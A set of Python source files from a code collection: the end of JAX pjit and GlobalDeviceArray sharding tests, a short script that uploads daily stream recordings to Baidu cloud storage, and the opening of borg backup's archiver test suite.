self.assertEqual(out1.local_shards[1].index, (slice(0, 2), slice(4, 8)))
self.assertListEqual([s.replica_id for s in out1.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
expected_matrix_mul = input_data @ input_data.T
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 2))
self.assertEqual(out2.local_shards[0].data.shape, (8, 2))
self.assertEqual(out2.local_shards[0].index, (slice(None), slice(None)))
self.assertEqual(out2.local_shards[1].index, (slice(None), slice(None)))
self.assertListEqual([s.replica_id for s in out2.local_shards],
[0, 1, 2, 3, 4, 5, 6, 7])
for s in out2.local_shards:
self.assertArraysEqual(s.data, input_data)
self.assertIsInstance(out3, global_device_array.GlobalDeviceArray)
self.assertEqual(out3.shape, (8, 2))
self.assertEqual(out3.local_shards[0].data.shape, (2, 2))
self.assertEqual(out3.local_shards[0].index, (slice(0, 2), slice(None)))
self.assertEqual(out3.local_shards[1].index, (slice(0, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out3.local_shards],
[0, 1, 0, 1, 0, 1, 0, 1])
for s in out3.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
self.assertIsInstance(out4, global_device_array.GlobalDeviceArray)
self.assertEqual(out4.shape, (8, 2))
self.assertEqual(out4.local_shards[0].data.shape, (1, 2))
self.assertEqual(out4.local_shards[0].index, (slice(0, 1), slice(None)))
self.assertEqual(out4.local_shards[1].index, (slice(1, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out4.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
for s in out4.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_mixed_inputs(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit,
in_axis_resources=(FROM_GDA, P('x', 'y')),
out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
def f(x, y):
return x @ x.T, y @ y.T
expected_matrix_mul = input_data @ input_data.T
out1, out2 = f(gda_obj, input_data)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out1._global_mesh.shape, {'x': 4, 'y': 2})
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 8))
self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
self.assertDictEqual(out2._global_mesh.shape, {'x': 4, 'y': 2})
for s in out2.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_non_gda_inputs(self):
input_shape = (8, 2)
input_data = np.arange(prod(input_shape)).reshape(input_shape)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit,
in_axis_resources=(None, P('x', 'y')),
out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
def f(x, y):
return x @ x.T, y @ y.T
expected_matrix_mul = input_data @ input_data.T
out1, out2 = f(input_data, input_data)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out1._global_mesh.shape, {'x': 4, 'y': 2})
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 8))
self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
self.assertDictEqual(out2._global_mesh.shape, {'x': 4, 'y': 2})
for s in out2.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
@jtu.with_mesh([('x', 2), ('y', 2)])
def test_pjit_gda_mesh_mismatch(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = ['x', 'y']
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesRegex(ValueError,
"Pjit's mesh and GDA's mesh should be equal."):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_wrong_resource_for_gda_input(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = ['x']
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesWithLiteralMatch(
ValueError,
"Got an input GDA to pjit with different partitioning than specified "
'in the in_axis_resources argument to pjit. The partitioning must '
'match, or use `jax.experimental.pjit.FROM_GDA` in `in_axis_resources`. '
"Got GDA spec: PartitionSpec('x',) and "
"pjit spec: PartitionSpec('x', 'y') "
'for GDA: GlobalDeviceArray(shape=(8, 2), dtype=float32)'):
@partial(pjit, in_axis_resources=P('x', 'y'), out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_caching(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(input_shape), dtype=np.float32).reshape(input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
input_shape, global_mesh, mesh_axes, cb)
trace_counter = [0]
@partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=P('x', 'y'))
def f(x, y):
trace_counter[0] += 1
return x @ y.T
f(gda_obj, gda_obj)
self.assertListEqual(trace_counter, [1])
f(gda_obj, gda_obj)
self.assertListEqual(trace_counter, [1])
f(input_data, input_data)
self.assertListEqual(trace_counter, [2])
f(gda_obj, input_data)
self.assertListEqual(trace_counter, [3])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_partition_spec_mismatch_semantically_equivalent(self):
global_mesh = jtu.create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = [None]
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
with jax._src.config.parallel_functions_output_gda(True):
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
@partial(pjit, in_axis_resources=P(None), out_axis_resources=P(None))
def f(x):
return x
output_gda = f(gda_obj)
# Ensure output_gda._mesh_axes = P() is matched with P(None).
self.assertEqual(output_gda._mesh_axes, ())
# P(None) is in_axis_resources.
f(output_gda)
def test_from_gda_duplicates(self):
global_mesh = jtu.create_global_mesh((1, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = ['x', 'y']
input_gda = create_gda(global_input_shape, global_mesh, mesh_axes)
# It's occasionally possible to end up with two FROM_GDA singletons (e.g. if
# pickling in_axis_resources and sending to other processes). Make sure this
# this doesn't cause an error to avoid user confusion.
from_gda_dup = pjit_lib._FromGdaSingleton()
with mesh(global_mesh.devices, global_mesh.axis_names):
pjit(lambda x: x, in_axis_resources=from_gda_dup, out_axis_resources=None)(
input_gda)
def test_no_recompilation_due_to_in_axis_resources(self):
global_mesh = jtu.create_global_mesh((1, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P(None,)
input_gda = create_gda(global_input_shape, global_mesh, mesh_axes)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=mesh_axes)
def f(x):
return x
with mesh(global_mesh.devices, global_mesh.axis_names):
out_gda = f(input_gda)
self.assertEqual(out_gda._mesh_axes, ())
before_cache = pjit_lib._pjit_lower.cache_info()
f(out_gda)
after_cache = pjit_lib._pjit_lower.cache_info()
self.assertNotEqual(id(before_cache), id(after_cache))
self.assertEqual(before_cache.hits + 1, after_cache.hits)
self.assertEqual(before_cache.misses, after_cache.misses)
def spec_regex(s):
return str(s).replace(r"(", r"\(").replace(r")", r"\)")
class PJitErrorTest(jtu.JaxTestCase):
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleArgs(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleOuts(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=P(resources, None))(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleConstraint(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources,)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r".*implies that the size of "
r"its dimension 0 should be divisible by " + mesh_size +
r", but it is equal to 3"):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesArgs(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesOuts(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesConstraint(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r", but resource axis "
r"x is undefined."):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgs(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgsAxisResourcesNone(self):
x = jnp.arange(2)
spec = P(None, None)
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowOuts(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 0")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowConstraint(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of with_sharding_constraint arguments " +
r"was given.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedInResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single in_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedOutResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single out_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2)])
def testInputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec, out_axis_resources=None),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testOutputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=None, out_axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit output has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testConstraintShardsXMapAxis(self):
spec = P('x')
f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"with_sharding_constraint input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testCatchesInnerXMapErrors(self):
f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']), out_axes=['i', 'j'],
axis_resources={'i': 'x', 'j': 'x'}),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(4)
with self.assertRaises(JAXTypeError):
f(x, x)
def testEmptyMesh(self):
error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
r"at the call site?")
with self.assertRaisesRegex(RuntimeError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=None)(jnp.arange(4))
@jtu.with_mesh([('x', 2)])
def testAxisResourcesMismatch(self):
x = jnp.ones([])
p = [None, None, None]
pjit(lambda x: x, (p,), p)([x, x, x]) # OK
error = re.escape(
r"pjit in_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification (None, None, None) for value "
r"tree PyTreeDef((*, *)). Note that pjit in_axis_resources that are "
r"non-trivial pytrees should always be wrapped in a tuple representing "
r"the argument list.")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x, y: x, p, p)(x, x) # Error, but make sure we hint at tupling
# TODO(apaszke): Disable implicit list casts and enable this
# error = re.escape(
# r"pjit in_axis_resources specification must be a tree prefix of the "
# r"corresponding value, got specification (None, None, None) for value "
# r"tree PyTreeDef(([*, *, *],)). Note that pjit in_axis_resources that "
# r"are non-trivial pytrees should always be wrapped in a tuple representing "
# r"the argument list. In particular, you're passing in a single argument "
# r"which means that pjit in_axis_resources might need to be wrapped in a "
# r"singleton tuple.")
# with self.assertRaisesRegex(ValueError, error):
# pjit(lambda x: x, p, p)([x, x, x]) # Error, but make sure we hint at singleton tuple
error = re.escape(
r"pjit out_axis_resources specification must be a tree prefix of the "
r"corresponding value, got specification [[None, None, None], None] for "
r"value tree PyTreeDef([*, *, *]).")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, (p,), [p, None])([x, x, x]) # Error, we raise a generic tree mismatch message
@jtu.with_mesh([('x', 2)])
def testNestedDifferentResources(self):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def f(x):
with mesh(np.array([jax.local_devices()[0]]), ('x')):
@partial(pjit, in_axis_resources=P('x'), out_axis_resources=None)
def h(x):
return x
return h(x)
xshape = (2, 5, 6)
x = jnp.arange(np.prod(xshape)).reshape(xshape)
with self.assertRaisesRegex(RuntimeError,
"Changing the physical mesh is not allowed.*"):
f(x)
class UtilTest(jtu.JaxTestCase):
def testOpShardingRoundTrip(self):
FakeDevice = namedtuple('FakeDevice', ['id'])
mesh_named_shape = OrderedDict([('a', 2), ('b', 3), ('c', 4), ('d', 7), ('e', 4)])
mesh_axes, mesh_shape = unzip2(mesh_named_shape.items())
devices = [FakeDevice(i) for i in range(np.prod(list(mesh_shape)))]
mesh = pxla.Mesh(np.array(devices).reshape(*mesh_shape), tuple(mesh_axes))
dims = 5
aval = jax.core.ShapedArray((len(devices),) * dims, jnp.float32)
def roundtrip(spec):
op_sharding = pjit_lib.get_aval_sharding_proto(aval, spec, mesh)
parsed_spec = pjit_lib.parse_op_sharding(op_sharding, mesh).partitions
self.assertEqual(parsed_spec[:len(spec)], spec)
self.assertEqual(parsed_spec[len(spec):], ((),) * (len(parsed_spec) - len(spec)))
special_specs = [P()]
for spec in special_specs:
roundtrip(spec)
rng = self.rng()
for i in range(100):
spec = [()] * dims
for axis in rng.permutation(mesh_axes)[:rng.randint(low=1, high=len(mesh_axes) + 1)]:
spec[rng.choice(dims)] += (axis,)
roundtrip(P(*spec))
@parameterized.named_parameters(
("linear", {'x': 0, 'y': 1, 'z': 2}, (('x',), ('y',), ('z',))),
("combine", {'x': 0, 'y': 0, 'z': 1}, (('x', 'y'), ('z',))),
("skip", {'x': 0, 'y': 0, 'z': 2}, (('x', 'y'), None, ('z',))),
("multi_skip", {'x': 0, 'y': 1, 'z': 3}, (('x',), ('y',), None, ('z',))),
)
def test_array_mapping_to_axis_resources(self, inp, expected_out):
self.assertEqual(pxla.array_mapping_to_axis_resources(inp), expected_out)
def test_get_input_metadata_fully_replicated(self):
global_mesh = jtu.create_global_mesh((2, 2), ('x', 'y'))
global_in_aval1 = jax.core.ShapedArray((4, 4), jnp.int32)
global_in_aval2 = jax.core.ShapedArray((4, 4, 4), jnp.int32)
global_in_aval3 = jax.core.ShapedArray((), jnp.int32)
in_avals = [global_in_aval1, global_in_aval2, global_in_aval3]
_, out_indices, _ = pxla._get_input_metadata(
in_avals, global_mesh, [{}, {}, {}], [False, False, False])
self.assertLen(out_indices, len(in_avals))
self.assertTrue(all(len(out) == len(global_mesh.local_devices)
for out in out_indices))
self.assertTrue(all(len(i) == aval.ndim
for out, aval in safe_zip(out_indices, in_avals) for i in out))
self.assertTrue(all(i == (slice(None),) * aval.ndim
for out, aval in safe_zip(out_indices, in_avals) for i in out))
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
backup2baidu.py | import subprocess
import os
import datetime
from utils.live import Live
from apscheduler.schedulers.blocking import BlockingScheduler
import keyboard
import threading
from utils.log import Log
import time
logger = Log()()
live = Live()
keyboard.add_hotkey(r'ctrl+/', os._exit, args=[0])
def daily_job():
PCSpath = r'.\utils\BaiduPCS-Go.exe'
local_base_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'rec')
pcs_base_path = '/录播/%s'
live_infos = live.live_infos.copy()
for key in live_infos:
name = live_infos[key]['uname']
base_path = os.path.join(local_base_path,name)
if os.path.exists(base_path):
a = subprocess.run([PCSpath,"mkdir",pcs_base_path % name])
print(a)
print(base_path)
for f in os.listdir(base_path):
if os.path.isfile(os.path.join(base_path,f)):
if '_mask' not in f:
x = '.'.join(f.split('.')[:-1]).split('_')[-1]
print(x)
print((datetime.date.today() - datetime.timedelta(days=1)).strftime('%Y%m%d'))
if (datetime.date.today() - datetime.timedelta(days=1)).strftime('%Y%m%d') == x:
a = subprocess.run([PCSpath,'upload',os.path.join(base_path,f),pcs_base_path % name])
print(a)
# def test():
# logger.info(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
# def scheduler_run():
# scheduler = BlockingScheduler()
# scheduler.add_job(test,'cron',day_of_week='0-6',hour=17,minute=10)
# scheduler.start()
# threading.Thread(target=scheduler_run,daemon=True).start()
# while True:
# time.sleep(1)
# a = a = subprocess.run([PCSpath,"share","set",'录播'])
daily_job() |
archiver.py | import argparse
import errno
import io
import json
import logging
import os
import pstats
import random
import re
import shutil
import socket
import stat
import subprocess
import sys
import tempfile
import time
import unittest
from binascii import unhexlify, b2a_base64
from configparser import ConfigParser
from datetime import datetime
from datetime import timedelta
from hashlib import sha256
from io import BytesIO, StringIO
from unittest.mock import patch
import pytest
try:
import llfuse
except ImportError:
pass
import borg
from .. import xattr, helpers, platform
from ..archive import Archive, ChunkBuffer
from ..archiver import Archiver, parse_storage_quota
from ..cache import Cache, LocalCache
from ..constants import * # NOQA
from ..crypto.low_level import bytes_to_long, num_cipher_blocks
from ..crypto.key import KeyfileKeyBase, RepoKey, KeyfileKey, Passphrase, TAMRequiredError
from ..crypto.keymanager import RepoIdMismatch, NotABorgKeyFile
from ..crypto.file_integrity import FileIntegrityError
from ..helpers import Location, get_security_dir
from ..helpers import Manifest, MandatoryFeatureUnsupported
from ..helpers import EXIT_SUCCESS, EXIT_WARNING, EXIT_ERROR
from ..helpers import bin_to_hex
from ..helpers import MAX_S
from ..helpers import msgpack
from ..helpers import flags_noatime, flags_normal
from ..nanorst import RstToTextLazy, rst_to_terminal
from ..patterns import IECommand, PatternMatcher, parse_pattern
from ..item import Item, ItemDiff
from ..logger import setup_logging
from ..remote import RemoteRepository, PathNotAllowed
from ..repository import Repository
from . import has_lchflags, has_llfuse
from . import BaseTestCase, changedir, environment_variable, no_selinux
from . import are_symlinks_supported, are_hardlinks_supported, are_fifos_supported, is_utime_fully_supported, is_birthtime_fully_supported
from .platform import fakeroot_detected
from .upgrader import make_attic_repo
from . import key
src_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def exec_cmd(*args, archiver=None, fork=False, exe=None, input=b'', binary_output=False, **kw):
if fork:
try:
if exe is None:
borg = (sys.executable, '-m', 'borg.archiver')
elif isinstance(exe, str):
borg = (exe, )
elif not isinstance(exe, tuple):
raise ValueError('exe must be None, a tuple or a str')
output = subprocess.check_output(borg + args, stderr=subprocess.STDOUT, input=input)
ret = 0
except subprocess.CalledProcessError as e:
output = e.output
ret = e.returncode
except SystemExit as e: # possibly raised by argparse
output = ''
ret = e.code
if binary_output:
return ret, output
else:
return ret, os.fsdecode(output)
else:
stdin, stdout, stderr = sys.stdin, sys.stdout, sys.stderr
try:
sys.stdin = StringIO(input.decode())
sys.stdin.buffer = BytesIO(input)
output = BytesIO()
# Always use utf-8 here, to simply .decode() below
output_text = sys.stdout = sys.stderr = io.TextIOWrapper(output, encoding='utf-8')
if archiver is None:
archiver = Archiver()
archiver.prerun_checks = lambda *args: None
archiver.exit_code = EXIT_SUCCESS
helpers.exit_code = EXIT_SUCCESS
try:
args = archiver.parse_args(list(args))
# argparse parsing may raise SystemExit when the command line is bad or
# actions that abort early (eg. --help) where given. Catch this and return
# the error code as-if we invoked a Borg binary.
except SystemExit as e:
output_text.flush()
return e.code, output.getvalue() if binary_output else output.getvalue().decode()
ret = archiver.run(args)
output_text.flush()
return ret, output.getvalue() if binary_output else output.getvalue().decode()
finally:
sys.stdin, sys.stdout, sys.stderr = stdin, stdout, stderr
def have_gnutar():
if not shutil.which('tar'):
return False
popen = subprocess.Popen(['tar', '--version'], stdout=subprocess.PIPE)
stdout, stderr = popen.communicate()
return b'GNU tar' in stdout
# check if the binary "borg.exe" is available (for local testing a symlink to virtualenv/bin/borg should do)
try:
exec_cmd('help', exe='borg.exe', fork=True)
BORG_EXES = ['python', 'binary', ]
except FileNotFoundError:
BORG_EXES = ['python', ]
@pytest.fixture(params=BORG_EXES)
def cmd(request):
if request.param == 'python':
exe = None
elif request.param == 'binary':
exe = 'borg.exe'
else:
raise ValueError("param must be 'python' or 'binary'")
def exec_fn(*args, **kw):
return exec_cmd(*args, exe=exe, fork=True, **kw)
return exec_fn
def test_return_codes(cmd, tmpdir):
repo = tmpdir.mkdir('repo')
input = tmpdir.mkdir('input')
output = tmpdir.mkdir('output')
input.join('test_file').write('content')
rc, out = cmd('init', '--encryption=none', '%s' % str(repo))
assert rc == EXIT_SUCCESS
rc, out = cmd('create', '%s::archive' % repo, str(input))
assert rc == EXIT_SUCCESS
with changedir(str(output)):
rc, out = cmd('extract', '%s::archive' % repo)
assert rc == EXIT_SUCCESS
rc, out = cmd('extract', '%s::archive' % repo, 'does/not/match')
assert rc == EXIT_WARNING # pattern did not match
rc, out = cmd('create', '%s::archive' % repo, str(input))
assert rc == EXIT_ERROR # duplicate archive name
"""
test_disk_full is very slow and not recommended to be included in daily testing.
for this test, an empty, writable 16MB filesystem mounted on DF_MOUNT is required.
for speed and other reasons, it is recommended that the underlying block device is
in RAM, not a magnetic or flash disk.
assuming /tmp is a tmpfs (in memory filesystem), one can use this:
dd if=/dev/zero of=/tmp/borg-disk bs=16M count=1
mkfs.ext4 /tmp/borg-disk
mkdir /tmp/borg-mount
sudo mount /tmp/borg-disk /tmp/borg-mount
if the directory does not exist, the test will be skipped.
"""
DF_MOUNT = '/tmp/borg-mount'
@pytest.mark.skipif(not os.path.exists(DF_MOUNT), reason="needs a 16MB fs mounted on %s" % DF_MOUNT)
def test_disk_full(cmd):
def make_files(dir, count, size, rnd=True):
shutil.rmtree(dir, ignore_errors=True)
os.mkdir(dir)
if rnd:
count = random.randint(1, count)
if size > 1:
size = random.randint(1, size)
for i in range(count):
fn = os.path.join(dir, "file%03d" % i)
with open(fn, 'wb') as f:
data = os.urandom(size)
f.write(data)
with environment_variable(BORG_CHECK_I_KNOW_WHAT_I_AM_DOING='YES'):
mount = DF_MOUNT
assert os.path.exists(mount)
repo = os.path.join(mount, 'repo')
input = os.path.join(mount, 'input')
reserve = os.path.join(mount, 'reserve')
for j in range(100):
shutil.rmtree(repo, ignore_errors=True)
shutil.rmtree(input, ignore_errors=True)
# keep some space and some inodes in reserve that we can free up later:
make_files(reserve, 80, 100000, rnd=False)
rc, out = cmd('init', repo)
if rc != EXIT_SUCCESS:
print('init', rc, out)
assert rc == EXIT_SUCCESS
try:
success, i = True, 0
while success:
i += 1
try:
make_files(input, 20, 200000)
except OSError as err:
if err.errno == errno.ENOSPC:
# already out of space
break
raise
try:
rc, out = cmd('create', '%s::test%03d' % (repo, i), input)
success = rc == EXIT_SUCCESS
if not success:
print('create', rc, out)
finally:
# make sure repo is not locked
shutil.rmtree(os.path.join(repo, 'lock.exclusive'), ignore_errors=True)
os.remove(os.path.join(repo, 'lock.roster'))
finally:
# now some error happened, likely we are out of disk space.
# free some space so we can expect borg to be able to work normally:
shutil.rmtree(reserve, ignore_errors=True)
rc, out = cmd('list', repo)
if rc != EXIT_SUCCESS:
print('list', rc, out)
rc, out = cmd('check', '--repair', repo)
if rc != EXIT_SUCCESS:
print('check', rc, out)
assert rc == EXIT_SUCCESS
class ArchiverTestCaseBase(BaseTestCase):
EXE = None # python source based
FORK_DEFAULT = False
prefix = ''
def setUp(self):
os.environ['BORG_CHECK_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_RECREATE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_PASSPHRASE'] = 'waytooeasyonlyfortests'
self.archiver = not self.FORK_DEFAULT and Archiver() or None
self.tmpdir = tempfile.mkdtemp()
self.repository_path = os.path.join(self.tmpdir, 'repository')
self.repository_location = self.prefix + self.repository_path
self.input_path = os.path.join(self.tmpdir, 'input')
self.output_path = os.path.join(self.tmpdir, 'output')
self.keys_path = os.path.join(self.tmpdir, 'keys')
self.cache_path = os.path.join(self.tmpdir, 'cache')
self.exclude_file_path = os.path.join(self.tmpdir, 'excludes')
self.patterns_file_path = os.path.join(self.tmpdir, 'patterns')
os.environ['BORG_KEYS_DIR'] = self.keys_path
os.environ['BORG_CACHE_DIR'] = self.cache_path
os.mkdir(self.input_path)
os.chmod(self.input_path, 0o777) # avoid troubles with fakeroot / FUSE
os.mkdir(self.output_path)
os.mkdir(self.keys_path)
os.mkdir(self.cache_path)
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b'input/file2\n# A comment line, then a blank line\n\n')
